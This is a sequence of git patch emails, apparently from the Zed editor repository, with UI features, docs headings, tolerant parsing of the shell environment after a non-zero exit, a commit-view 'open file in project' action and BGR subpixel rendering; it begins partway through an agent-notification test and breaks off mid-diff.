language_model::LanguageModelRegistry::test(cx); + ::set_global(fs.clone(), cx); + }); + + let project = Project::test(fs, [], cx).await; + let multi_workspace_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = multi_workspace_handle + .read_with(cx, |mw, _cx| mw.workspace().clone()) + .unwrap(); + + let cx = &mut VisualTestContext::from_window(multi_workspace_handle.into(), cx); + + let thread_store = cx.update(|_window, cx| cx.new(|cx| ThreadStore::new(cx))); + let connection_store = + cx.update(|_window, cx| cx.new(|cx| AgentConnectionStore::new(project.clone(), cx))); + + let conversation_view = cx.update(|window, cx| { + cx.new(|cx| { + ConversationView::new( + Rc::new(StubAgentServer::default_response()), + connection_store, + Agent::Custom { id: "Test".into() }, + None, + None, + None, + None, + None, + workspace.downgrade(), + project.clone(), + Some(thread_store), + None, + "agent_panel", + window, + cx, + ) + }) + }); + + cx.run_until_parked(); + + let message_editor = message_editor(&conversation_view, cx); + message_editor.update_in(cx, |editor, window, cx| { + editor.set_text("Hello", window, cx); + }); + + active_thread(&conversation_view, cx) + .update_in(cx, |view, window, cx| view.send(window, cx)); + + cx.run_until_parked(); + + assert_eq!( + cx.windows() + .iter() + .filter(|window| window.downcast::().is_some()) + .count(), + 1, + "Expected a notification while the thread is not visible" + ); + + multi_workspace_handle + .update(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + }) + .unwrap(); + + cx.run_until_parked(); + + assert_eq!( + cx.windows() + .iter() + .filter(|window| window.downcast::().is_some()) + .count(), + 0, + "Notification should auto-dismiss when the sidebar opens and makes the thread visible" + ); + } + #[gpui::test] async fn test_notification_when_workspace_is_background_in_multi_workspace( cx: &mut TestAppContext, From 5a38ebef606a9ab1f54ec747e03485985964dba3 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Wed, 29 Apr 2026 08:38:03 -0300 Subject: [PATCH 099/231] recent_projects: Add "open in new window" action to opened projects (#55168) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR adds a "open in new window" button to the projects that are already open in the current window. This matches a capability that was only available through the threads sidebar. Screenshot 2026-04-29 at 11  28@2x Release Notes: - Added the ability to move a currently open project to a new window through the recent projects modal. --- assets/icons/open_new_window.svg | 7 -- crates/icons/src/icons.rs | 1 - .../src/highlighted_match_with_paths.rs | 5 +- crates/recent_projects/src/recent_projects.rs | 99 ++++++++++++++++++- 4 files changed, 99 insertions(+), 13 deletions(-) delete mode 100644 assets/icons/open_new_window.svg diff --git a/assets/icons/open_new_window.svg b/assets/icons/open_new_window.svg deleted file mode 100644 index c81d49f9ff9edf..00000000000000 --- a/assets/icons/open_new_window.svg +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/crates/icons/src/icons.rs b/crates/icons/src/icons.rs index b49ad8e340b768..d67c4f76e62608 100644 --- a/crates/icons/src/icons.rs +++ b/crates/icons/src/icons.rs @@ -184,7 +184,6 @@ pub enum IconName { NewThread, Notepad, OpenFolder, - OpenNewWindow, Option, PageDown, PageUp, diff --git a/crates/picker/src/highlighted_match_with_paths.rs b/crates/picker/src/highlighted_match_with_paths.rs index 7c88213437feea..62bae4431244bf 100644 --- a/crates/picker/src/highlighted_match_with_paths.rs +++ b/crates/picker/src/highlighted_match_with_paths.rs @@ -52,7 +52,9 @@ impl HighlightedMatch { } impl RenderOnce for HighlightedMatch { fn render(self, _window: &mut Window, _: &mut App) -> impl IntoElement { - HighlightedLabel::new(self.text, self.highlight_positions).color(self.color) + HighlightedLabel::new(self.text, self.highlight_positions) + .color(self.color) + .truncate() } } @@ -74,6 +76,7 @@ impl HighlightedMatchWithPaths { impl RenderOnce for HighlightedMatchWithPaths { fn render(mut self, _window: &mut Window, _: &mut App) -> impl IntoElement { v_flex() + .min_w_0() .child( h_flex() .gap_1() diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index b93fa009fce193..f5b5f78fd24e30 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -1115,6 +1115,12 @@ impl PickerDelegate for RecentProjectsDelegate { return; }; + if secondary && key.host().is_none() && self.window_project_groups.len() >= 2 { + move_project_group_to_new_window(key, window, cx); + cx.emit(DismissEvent); + return; + } + let key = key.clone(); let path_list = key.path_list().clone(); if let Some(handle) = window.window_handle().downcast::() { @@ -1406,8 +1412,40 @@ impl PickerDelegate for RecentProjectsDelegate { }; let project_group_key = key.clone(); + let is_local = key.host().is_none(); + let has_multiple_groups = self.window_project_groups.len() >= 2; let secondary_actions = h_flex() - .gap_1() + .gap_0p5() + .when(is_local && has_multiple_groups, |this| { + this.child( + IconButton::new("move_to_new_window", IconName::ArrowUpRight) + .icon_size(IconSize::Small) + .tooltip({ + let focus_handle = self.focus_handle.clone(); + move |_, cx| { + Tooltip::for_action_in( + "Open in New Window", + &menu::SecondaryConfirm, + &focus_handle, + cx, + ) + } + }) + .on_click({ + let project_group_key = project_group_key.clone(); + cx.listener(move |_picker, _, window, cx| { + cx.stop_propagation(); + window.prevent_default(); + move_project_group_to_new_window( + &project_group_key, + window, + cx, + ); + cx.emit(DismissEvent); + }) + }), + ) + }) .when(!is_active, |this| { this.child( IconButton::new("remove_open_project", IconName::Close) @@ -1433,12 +1471,13 @@ impl PickerDelegate for RecentProjectsDelegate { Some( ListItem::new(ix) - .toggle_state(selected) .inset(true) + .toggle_state(selected) .spacing(ListItemSpacing::Sparse) .child( h_flex() .id("open_project_info_container") + .w_full() .gap_2p5() .when(self.has_any_non_local_projects, |this| { this.child(Icon::new(icon).color(Color::Muted)) @@ -1540,7 +1579,7 @@ impl PickerDelegate for RecentProjectsDelegate { ) }) .child( - IconButton::new("open_new_window", IconName::OpenNewWindow) + IconButton::new("open_new_window", IconName::ArrowUpRight) .icon_size(IconSize::Small) .tooltip({ move |_, cx| { @@ -1616,11 +1655,23 @@ impl PickerDelegate for RecentProjectsDelegate { fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { let focus_handle = self.focus_handle.clone(); let popover_style = matches!(self.style, ProjectPickerStyle::Popover); + let is_already_open_entry = matches!( self.filtered_entries.get(self.selected_index), Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::ProjectGroup(_)) ); + let show_move_to_new_window = match self.filtered_entries.get(self.selected_index) { + Some(ProjectPickerEntry::ProjectGroup(hit)) => { + self.window_project_groups.len() >= 2 + && self + .window_project_groups + .get(hit.candidate_id) + .is_some_and(|key| key.host().is_none()) + } + _ => false, + }; + if popover_style { return Some( v_flex() @@ -1753,7 +1804,31 @@ impl PickerDelegate for RecentProjectsDelegate { }) .map(|this| { if is_already_open_entry { - this.child( + this.when(show_move_to_new_window, |this| { + this.child({ + let window_project_groups = self.window_project_groups.clone(); + let selected_index = self.selected_index; + let filtered_entries = self.filtered_entries.clone(); + Button::new("move_to_new_window", "New Window") + .key_binding(KeyBinding::for_action_in( + &menu::SecondaryConfirm, + &focus_handle, + cx, + )) + .on_click(move |_, window, cx| { + let key = match filtered_entries.get(selected_index) { + Some(ProjectPickerEntry::ProjectGroup(hit)) => { + window_project_groups.get(hit.candidate_id).cloned() + } + _ => None, + }; + if let Some(key) = key { + move_project_group_to_new_window(&key, window, cx); + } + }) + }) + }) + .child( Button::new("activate", "Activate") .key_binding(KeyBinding::for_action_in( &menu::Confirm, @@ -1930,6 +2005,22 @@ pub(crate) fn highlights_for_path( }, ) } + +fn move_project_group_to_new_window(key: &ProjectGroupKey, window: &mut Window, cx: &mut App) { + if let Some(handle) = window.window_handle().downcast::() { + let key = key.clone(); + cx.defer(move |cx| { + handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace + .open_project_group_in_new_window(&key, window, cx) + .detach_and_log_err(cx); + }) + .log_err(); + }); + } +} + fn open_local_project( workspace: WeakEntity, create_new_window: bool, From 8909ce484898986cbaaa3226c3f1d5873022473f Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Wed, 29 Apr 2026 08:38:07 -0300 Subject: [PATCH 100/231] docs: Add headings to worktree page (#55185) Making it easier to navigate the "Git Worktrees" section in the Git page of the docs. Release Notes: - N/A --- docs/src/git.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/docs/src/git.md b/docs/src/git.md index aa24878ba04523..c2e19e3d88de1d 100644 --- a/docs/src/git.md +++ b/docs/src/git.md @@ -190,6 +190,8 @@ From the picker, you can: - Open an existing worktree in a new window - Delete linked worktrees that are not currently open in the project +### Worktree Management + New worktrees are created in detached HEAD state. After switching to the new worktree, use the branch picker next to the worktree picker to create a new branch or check out an existing, unused branch. This keeps Zed from accidentally checking out the same branch in multiple worktrees. @@ -199,12 +201,16 @@ By default, Zed creates worktrees under `../worktrees` relative to the repositor See [All Settings](./reference/all-settings.md#git-worktree-directory) for examples. -If your project contains multiple Git repositories (i.e., multi-root folders), Zed creates a linked worktree for each repository when creating a new worktree from the picker. -Non-Git folders in the same project are included in the new workspace as-is. +### Init Setup To run setup steps after Zed creates a linked worktree, use the [`create_worktree` task hook](./tasks.md#hooks). For agent-specific workflows, see [Worktree Isolation](./ai/parallel-agents.md#worktree-isolation). +### Multi-root Workspaces + +If your project contains multiple Git repositories (i.e., multi-root folders), Zed creates a linked worktree for each repository when creating a new worktree from the picker. +Non-Git folders in the same project are included in the new workspace as-is. + ## Merge Conflicts When you encounter merge conflicts after a merge, rebase, or pull, Zed highlights the conflicting regions in your files and displays resolution buttons above each conflict. From 905bea99972e3d61b1f71c6eb7b5f58e7a49e27d Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Wed, 29 Apr 2026 13:56:56 +0200 Subject: [PATCH 101/231] Accept shell environment after non-zero shell exit (#55175) Summary: When a user shell hook returned an error, Zed would fail to load the shell environment even if the captured environment output was still valid. This could prevent the terminal panel and other shell-dependent features, such as the debugger and agent panel, from creating terminals or running commands. That is especially disruptive when the shell environment is valid and a terminal could otherwise still be used. Zed now ignores the non-zero shell exit in this case when it can still parse a valid shell environment, allowing those features to continue working. Self-Review Checklist: - [x] I have reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed shell environment loading when login shells exit non-zero after printing environment variables. --- crates/util/src/shell_env.rs | 141 +++++++++++++++++++++++++++++------ 1 file changed, 118 insertions(+), 23 deletions(-) diff --git a/crates/util/src/shell_env.rs b/crates/util/src/shell_env.rs index d12c352d541f27..ee765a9a27c553 100644 --- a/crates/util/src/shell_env.rs +++ b/crates/util/src/shell_env.rs @@ -38,6 +38,39 @@ pub async fn capture( return capture_unix(shell_path.as_ref(), args, directory.as_ref()).await; } +/// Try to parse the environment output before checking the exit status. +/// The user's shell rc files may contain commands that fail (e.g. editor +/// integrations that call posix_spawnp outside a real PTY), causing a +/// non-zero exit status even though `zed --printenv` ran successfully and +/// produced valid output on its separate fd. +fn parse_env_output( + env_output: &str, + status: &std::process::ExitStatus, + successful_capture_warning: impl FnOnce() -> String, + failed_capture_error: impl FnOnce() -> String, +) -> Result> { + match parse_env_map_from_noisy_output(env_output) { + Ok(env_map) => { + if !status.success() { + log::warn!("{}", successful_capture_warning()); + } + Ok(env_map) + } + Err(parse_error) => { + if !status.success() { + anyhow::bail!( + "{}. Failed to deserialize environment variables from json: {parse_error}. output: {env_output}", + failed_capture_error(), + ); + } + + anyhow::bail!( + "Failed to deserialize environment variables from json: {parse_error}. output: {env_output}" + ); + } + } +} + #[cfg(unix)] async fn capture_unix( shell_path: &Path, @@ -123,19 +156,25 @@ async fn capture_unix( let (env_output, process_output) = spawn_and_read_fd(command, fd_num).await?; let env_output = String::from_utf8_lossy(&env_output); - anyhow::ensure!( - process_output.status.success(), - "login shell exited with {}. stdout: {:?}, stderr: {:?}", - process_output.status, - String::from_utf8_lossy(&process_output.stdout), - String::from_utf8_lossy(&process_output.stderr), - ); - - // Parse the JSON output from zed --printenv - let env_map = parse_env_map_from_noisy_output(&env_output).with_context(|| { - format!("Failed to deserialize environment variables from json: {env_output}") - })?; - Ok(env_map) + parse_env_output( + &env_output, + &process_output.status, + || { + format!( + "login shell exited with {} but environment was captured successfully. stderr: {:?}", + process_output.status, + String::from_utf8_lossy(&process_output.stderr), + ) + }, + || { + format!( + "login shell exited with {}. stdout: {:?}, stderr: {:?}", + process_output.status, + String::from_utf8_lossy(&process_output.stdout), + String::from_utf8_lossy(&process_output.stderr), + ) + }, + ) } #[cfg(unix)] @@ -241,16 +280,72 @@ async fn capture_windows( .output() .await .with_context(|| format!("command {cmd:?}"))?; - anyhow::ensure!( - output.status.success(), - "Command {cmd:?} failed with {}. stdout: {:?}, stderr: {:?}", - output.status, - String::from_utf8_lossy(&output.stdout), - String::from_utf8_lossy(&output.stderr), - ); let env_output = String::from_utf8_lossy(&output.stdout); - parse_env_map_from_noisy_output(&env_output).with_context(|| { - format!("Failed to deserialize environment variables from json: {env_output}") - }) + parse_env_output( + &env_output, + &output.status, + || { + format!( + "Command {cmd:?} exited with {} but environment was captured successfully. stderr: {:?}", + output.status, + String::from_utf8_lossy(&output.stderr), + ) + }, + || { + format!( + "Command {cmd:?} failed with {}. stdout: {:?}, stderr: {:?}", + output.status, + String::from_utf8_lossy(&output.stdout), + String::from_utf8_lossy(&output.stderr), + ) + }, + ) +} + +#[cfg(test)] +mod tests { + use std::process::ExitStatus; + + use super::*; + use crate::path; + + #[cfg(unix)] + fn exit_status(code: i32) -> ExitStatus { + use std::os::unix::process::ExitStatusExt; + + ExitStatus::from_raw(code << 8) + } + + #[cfg(windows)] + fn exit_status(code: u32) -> ExitStatus { + use std::os::windows::process::ExitStatusExt; + + ExitStatus::from_raw(code) + } + + #[test] + fn parse_env_output_accepts_valid_env_when_shell_exits_nonzero() { + let env_json = serde_json::json!({ + "PATH": path!("/usr/bin"), + "SHELL": path!("/bin/zsh"), + }); + let env_output = format!("shell startup noise\n{env_json}\nshell shutdown noise"); + + let env_map = parse_env_output( + &env_output, + &exit_status(1), + || "shell exited with 1 but environment was captured successfully".to_string(), + || panic!("failed capture error should not be evaluated for valid environment output"), + ) + .expect("valid environment output should be returned despite non-zero shell exit"); + assert_eq!( + env_map.get("PATH").map(String::as_str), + Some(path!("/usr/bin")) + ); + assert_eq!( + env_map.get("SHELL").map(String::as_str), + Some(path!("/bin/zsh")) + ); + } } From 50ccc4122befab35659b734226797ace8a19bdee Mon Sep 17 00:00:00 2001 From: Neel Date: Wed, 29 Apr 2026 13:07:39 +0100 Subject: [PATCH 102/231] git_ui: Add option to jump to project file from commit (#55088) Using the `Open File` action from a file in commit context takes you to a read-only snapshot of the file at the point in time of the commit. This change makes it so you navigate to the current working copy of the file, if one exists. This has similar semantics to copy file reference. For a file that still exists at HEAD: image For a file that no longer exists: image Release Notes: - Add affordance to jump to project file from commit view --- crates/editor/src/editor.rs | 10 +++ crates/editor/src/element.rs | 15 ++++ crates/git_ui/src/commit_view.rs | 115 +++++++++++++++++++++++++++++-- 3 files changed, 136 insertions(+), 4 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index c9ca01c7878939..e523ae27032284 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -902,6 +902,16 @@ pub trait Addon: 'static { None } + fn extend_buffer_header_context_menu( + &self, + menu: ui::ContextMenu, + _: &language::BufferSnapshot, + _: &mut Window, + _: &mut App, + ) -> ui::ContextMenu { + menu + } + fn override_status_for_buffer_id(&self, _: BufferId, _: &App) -> Option { None } diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index a6be884058ef52..69a829e578b45f 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -8736,6 +8736,7 @@ pub(crate) fn render_buffer_header( let file = buffer.file().cloned(); let editor = editor.clone(); + let buffer_snapshot = buffer.clone(); right_click_menu("buffer-header-context-menu") .trigger(move |_, _, _| header) @@ -8743,6 +8744,7 @@ pub(crate) fn render_buffer_header( let menu_context = focus_handle.clone(); let editor = editor.clone(); let file = file.clone(); + let buffer_snapshot = buffer_snapshot.clone(); ContextMenu::build(window, cx, move |mut menu, window, cx| { if let Some(file) = file && let Some(project) = editor.read(cx).project() @@ -8829,6 +8831,19 @@ pub(crate) fn render_buffer_header( }); } + menu = editor.update(cx, |editor, cx| { + let mut menu = menu; + for addon in editor.addons.values() { + menu = addon.extend_buffer_header_context_menu( + menu, + &buffer_snapshot, + window, + cx, + ); + } + menu + }); + menu.context(menu_context) }) }) diff --git a/crates/git_ui/src/commit_view.rs b/crates/git_ui/src/commit_view.rs index b3783fe2b70862..19dea7adafea3c 100644 --- a/crates/git_ui/src/commit_view.rs +++ b/crates/git_ui/src/commit_view.rs @@ -27,7 +27,7 @@ use std::{ sync::Arc, }; use theme::ActiveTheme; -use ui::{DiffStat, Divider, Tooltip, prelude::*}; +use ui::{ContextMenu, DiffStat, Divider, Tooltip, prelude::*}; use util::{ResultExt, paths::PathStyle, rel_path::RelPath, truncate_and_trailoff}; use workspace::item::TabTooltipContent; use workspace::{ @@ -42,7 +42,15 @@ use workspace::{ use crate::commit_tooltip::CommitAvatar; use crate::git_panel::GitPanel; -actions!(git, [ApplyCurrentStash, PopCurrentStash, DropCurrentStash,]); +actions!( + git, + [ + ApplyCurrentStash, + PopCurrentStash, + DropCurrentStash, + OpenFileAtHead, + ] +); pub fn init(cx: &mut App) { cx.observe_new(|workspace: &mut Workspace, _window, _cx| { @@ -65,6 +73,7 @@ pub struct CommitView { stash: Option, multibuffer: Entity, repository: Entity, + workspace: WeakEntity, remote: Option, } @@ -78,6 +87,7 @@ struct GitBlob { struct CommitDiffAddon { file_statuses: HashMap, + commit_view: WeakEntity, } impl Addon for CommitDiffAddon { @@ -92,6 +102,45 @@ impl Addon for CommitDiffAddon { ) -> Option { self.file_statuses.get(&buffer_id).copied() } + + fn extend_buffer_header_context_menu( + &self, + menu: ContextMenu, + buffer: &language::BufferSnapshot, + _window: &mut Window, + cx: &mut App, + ) -> ContextMenu { + let file_to_open = buffer.file().and_then(|file| { + let commit_view = self.commit_view.upgrade()?; + let commit_view = commit_view.read(cx); + let project_path = commit_view + .repository + .read(cx) + .repo_path_to_project_path(&RepoPath::from_rel_path(file.path()), cx)?; + let exists_at_head = commit_view + .workspace + .upgrade()? + .read(cx) + .project() + .read(cx) + .entry_for_path(&project_path, cx) + .is_some(); + exists_at_head.then(|| file.clone()) + }); + + menu.when_some(file_to_open, |menu, file| { + let commit_view = self.commit_view.clone(); + menu.entry( + "Open File in Project", + Some(Box::new(OpenFileAtHead)), + move |window, cx| { + commit_view + .update(cx, |view, cx| view.open_file_at_head(&file, window, cx)) + .log_err(); + }, + ) + }) + } } const COMMIT_MESSAGE_SORT_PREFIX: u64 = 0; @@ -130,12 +179,14 @@ impl CommitView { workspace .update_in(cx, |workspace, window, cx| { let project = workspace.project(); + let workspace_handle = cx.weak_entity(); let commit_view = cx.new(|cx| { CommitView::new( commit_details, commit_diff, repo, project.clone(), + workspace_handle, stash, window, cx, @@ -166,6 +217,7 @@ impl CommitView { commit_diff: CommitDiff, repository: Entity, project: Entity, + workspace: WeakEntity, stash: Option, window: &mut Window, cx: &mut Context, @@ -361,8 +413,12 @@ impl CommitView { } this.update(cx, |this, cx| { + let commit_view = cx.weak_entity(); this.editor.update(cx, |editor, _cx| { - editor.register_addon(CommitDiffAddon { file_statuses }); + editor.register_addon(CommitDiffAddon { + file_statuses, + commit_view, + }); }); if !binary_buffer_ids.is_empty() { this.editor.update(cx, |editor, cx| { @@ -396,6 +452,7 @@ impl CommitView { multibuffer, stash, repository, + workspace, remote, } } @@ -420,6 +477,50 @@ impl CommitView { self.multibuffer.read(cx).snapshot(cx).total_changed_lines() } + fn open_file_at_head( + &mut self, + file: &Arc, + window: &mut Window, + cx: &mut Context, + ) { + let rel_path = file.path().clone(); + let worktree_id = file.worktree_id(cx); + let repo_path = RepoPath::from_rel_path(&rel_path); + let project_path = self + .repository + .read(cx) + .repo_path_to_project_path(&repo_path, cx) + .unwrap_or(project::ProjectPath { + worktree_id, + path: rel_path, + }); + + self.workspace + .update(cx, |workspace, cx| { + workspace + .open_path_preview(project_path, None, false, false, true, window, cx) + .detach_and_log_err(cx); + }) + .log_err(); + } + + fn open_file_at_head_action( + &mut self, + _: &OpenFileAtHead, + window: &mut Window, + cx: &mut Context, + ) { + let Some(file) = self + .editor + .read(cx) + .active_buffer(cx) + .and_then(|buffer| buffer.read(cx).file().cloned()) + else { + return; + }; + self.open_file_at_head(&file, window, cx); + } + fn render_header(&self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let commit = &self.commit; let author_name = commit.author_name.clone(); @@ -934,13 +1035,17 @@ impl Item for CommitView { .map(|addon| addon.file_statuses.clone()) .unwrap_or_default(); Task::ready(Some(cx.new(|cx| { + let commit_view = cx.weak_entity(); let editor = cx.new({ let file_statuses = file_statuses.clone(); |cx| { let mut editor = self .editor .update(cx, |editor, cx| editor.clone(window, cx)); - editor.register_addon(CommitDiffAddon { file_statuses }); + editor.register_addon(CommitDiffAddon { + file_statuses, + commit_view, + }); editor } }); @@ -951,6 +1056,7 @@ impl Item for CommitView { commit: self.commit.clone(), stash: self.stash, repository: self.repository.clone(), + workspace: self.workspace.clone(), remote: self.remote.clone(), } }))) @@ -963,6 +1069,7 @@ impl Render for CommitView { v_flex() .key_context(if is_stash { "StashDiff" } else { "CommitDiff" }) + .on_action(cx.listener(Self::open_file_at_head_action)) .size_full() .bg(cx.theme().colors().editor_background) .child(self.render_header(window, cx)) From 67b9716142f1d531aae21e56827772415437d146 Mon Sep 17 00:00:00 2001 From: John Tur Date: Wed, 29 Apr 2026 14:26:19 +0200 Subject: [PATCH 103/231] Support BGR subpixel layout (#55174) Release Notes: - Added text rendering support for BGR subpixel layouts. --- crates/gpui_linux/src/linux/wayland/client.rs | 10 ++++++++-- crates/gpui_linux/src/linux/wayland/window.rs | 12 ++++++++++++ crates/gpui_linux/src/linux/x11/client.rs | 9 +++++++-- crates/gpui_linux/src/linux/x11/window.rs | 7 ++++++- crates/gpui_wgpu/src/shaders.wgsl | 3 ++- crates/gpui_wgpu/src/shaders_subpixel.wgsl | 5 ++++- crates/gpui_wgpu/src/wgpu_renderer.rs | 12 ++++++++++-- crates/gpui_windows/src/directx_renderer.rs | 6 ++++++ crates/gpui_windows/src/shaders.hlsl | 9 +++++++-- 9 files changed, 62 insertions(+), 11 deletions(-) diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index 3b8ca0f45025b7..f91efa53e8d391 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -185,6 +185,7 @@ pub struct InProgressOutput { scale: Option, position: Option>, size: Option>, + subpixel: Option, } impl InProgressOutput { @@ -195,6 +196,7 @@ impl InProgressOutput { name: self.name.clone(), scale, bounds: Bounds::new(position, size), + subpixel: self.subpixel, }) } else { None @@ -207,6 +209,7 @@ pub struct Output { pub name: Option, pub scale: i32, pub bounds: Bounds, + pub subpixel: Option, } pub(crate) struct WaylandClientState { @@ -1166,8 +1169,11 @@ impl Dispatch for WaylandClientStatePtr { wl_output::Event::Scale { factor } => { in_progress_output.scale = Some(factor); } - wl_output::Event::Geometry { x, y, .. } => { - in_progress_output.position = Some(point(DevicePixels(x), DevicePixels(y))) + wl_output::Event::Geometry { x, y, subpixel, .. } => { + in_progress_output.position = Some(point(DevicePixels(x), DevicePixels(y))); + if let WEnum::Value(subpixel) = subpixel { + in_progress_output.subpixel = Some(subpixel); + } } wl_output::Event::Mode { width, height, .. } => { in_progress_output.size = Some(size(DevicePixels(width), DevicePixels(height))) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 9862d307ef0f92..5d53496c057f1a 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -403,6 +403,16 @@ impl WaylandWindowState { || self.background_appearance != WindowBackgroundAppearance::Opaque } + fn update_subpixel_layout(&mut self) { + use wayland_client::protocol::wl_output::Subpixel; + let is_bgr = self + .display + .as_ref() + .and_then(|(_, output)| output.subpixel) + .is_some_and(|s| s == Subpixel::HorizontalBgr); + self.renderer.set_subpixel_layout(is_bgr); + } + pub fn primary_output_scale(&mut self) -> i32 { let mut scale = 1; let mut current_output = self.display.take(); @@ -864,6 +874,7 @@ impl WaylandWindowStatePtr { state.outputs.insert(id, output.clone()); let scale = state.primary_output_scale(); + state.update_subpixel_layout(); // We use `PreferredBufferScale` instead to set the scale if it's available if state.surface.version() < wl_surface::EVT_PREFERRED_BUFFER_SCALE_SINCE { @@ -876,6 +887,7 @@ impl WaylandWindowStatePtr { state.outputs.remove(&output.id()); let scale = state.primary_output_scale(); + state.update_subpixel_layout(); // We use `PreferredBufferScale` instead to set the scale if it's available if state.surface.version() < wl_surface::EVT_PREFERRED_BUFFER_SCALE_SINCE { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index 07d1596a2f7b68..03272a99051aa7 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ b/crates/gpui_linux/src/linux/x11/client.rs @@ -188,7 +188,7 @@ pub struct X11ClientState { xkb_device_id: i32, client_side_decorations_supported: bool, pub(crate) x_root_index: usize, - pub(crate) _resource_database: Database, + pub(crate) resource_database: Database, pub(crate) atoms: XcbAtoms, pub(crate) windows: HashMap, pub(crate) mouse_focused_window: Option, @@ -525,7 +525,7 @@ impl X11Client { xkb_device_id, client_side_decorations_supported, x_root_index, - _resource_database: resource_database, + resource_database, atoms, windows: HashMap::default(), mouse_focused_window: None, @@ -1599,6 +1599,10 @@ impl LinuxClient for X11Client { let appearance = state.common.appearance; let compositor_gpu = state.compositor_gpu.take(); let supports_xinput_gestures = state.supports_xinput_gestures; + let is_bgr = state + .resource_database + .get_string("Xft.rgba", "Xft.Rgba") + .is_some_and(|v| v.eq_ignore_ascii_case("bgr")); let window = X11Window::new( handle, X11ClientStatePtr(Rc::downgrade(&self.0)), @@ -1615,6 +1619,7 @@ impl LinuxClient for X11Client { appearance, parent_window, supports_xinput_gestures, + is_bgr, )?; check_reply( || "Failed to set XdndAware property", diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index 285ba8802db744..b44ac2faf41821 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -425,6 +425,7 @@ impl X11WindowState { appearance: WindowAppearance, parent_window: Option, supports_xinput_gestures: bool, + is_bgr: bool, ) -> anyhow::Result { let x_screen_index = params .display_id @@ -702,7 +703,7 @@ impl X11WindowState { xcb_flush(xcb); - let renderer = { + let mut renderer = { let raw_window = RawWindow { connection: as_raw_xcb_connection::AsRawXcbConnection::as_raw_xcb_connection( xcb, @@ -725,6 +726,8 @@ impl X11WindowState { WgpuRenderer::new(gpu_context, &raw_window, config, compositor_gpu)? }; + renderer.set_subpixel_layout(is_bgr); + // Set max window size hints based on the GPU's maximum texture dimension. // This prevents the window from being resized larger than what the GPU can render. let max_texture_size = renderer.max_texture_size(); @@ -883,6 +886,7 @@ impl X11Window { appearance: WindowAppearance, parent_window: Option, supports_xinput_gestures: bool, + is_bgr: bool, ) -> anyhow::Result { let ptr = X11WindowStatePtr { state: Rc::new(RefCell::new(X11WindowState::new( @@ -901,6 +905,7 @@ impl X11Window { appearance, parent_window, supports_xinput_gestures, + is_bgr, )?)), callbacks: Rc::new(RefCell::new(Callbacks::default())), xcb: xcb.clone(), diff --git a/crates/gpui_wgpu/src/shaders.wgsl b/crates/gpui_wgpu/src/shaders.wgsl index 12ce7d29b0b816..b700697f47b932 100644 --- a/crates/gpui_wgpu/src/shaders.wgsl +++ b/crates/gpui_wgpu/src/shaders.wgsl @@ -87,7 +87,8 @@ struct GammaParams { gamma_ratios: vec4, grayscale_enhanced_contrast: f32, subpixel_enhanced_contrast: f32, - pad: vec2, + is_bgr: u32, + pad: u32, } @group(0) @binding(0) var globals: GlobalParams; diff --git a/crates/gpui_wgpu/src/shaders_subpixel.wgsl b/crates/gpui_wgpu/src/shaders_subpixel.wgsl index 7acbd2e3d2e68e..37face0c482ac4 100644 --- a/crates/gpui_wgpu/src/shaders_subpixel.wgsl +++ b/crates/gpui_wgpu/src/shaders_subpixel.wgsl @@ -38,7 +38,10 @@ fn vs_subpixel_sprite(@builtin(vertex_index) vertex_id: u32, @builtin(instance_i @fragment fn fs_subpixel_sprite(input: SubpixelSpriteOutput) -> SubpixelSpriteFragmentOutput { - let sample = textureSample(t_sprite, s_sprite, input.tile_position).rgb; + var sample = textureSample(t_sprite, s_sprite, input.tile_position).rgb; + if (gamma_params.is_bgr != 0u) { + sample = sample.bgr; + } let alpha_corrected = apply_contrast_and_gamma_correction3(sample, input.color.rgb, gamma_params.subpixel_enhanced_contrast, gamma_params.gamma_ratios); // Alpha clip after using the derivatives. diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index 39b6f3f7bdfee9..7377c73fea1030 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -50,7 +50,8 @@ struct GammaParams { gamma_ratios: [f32; 4], 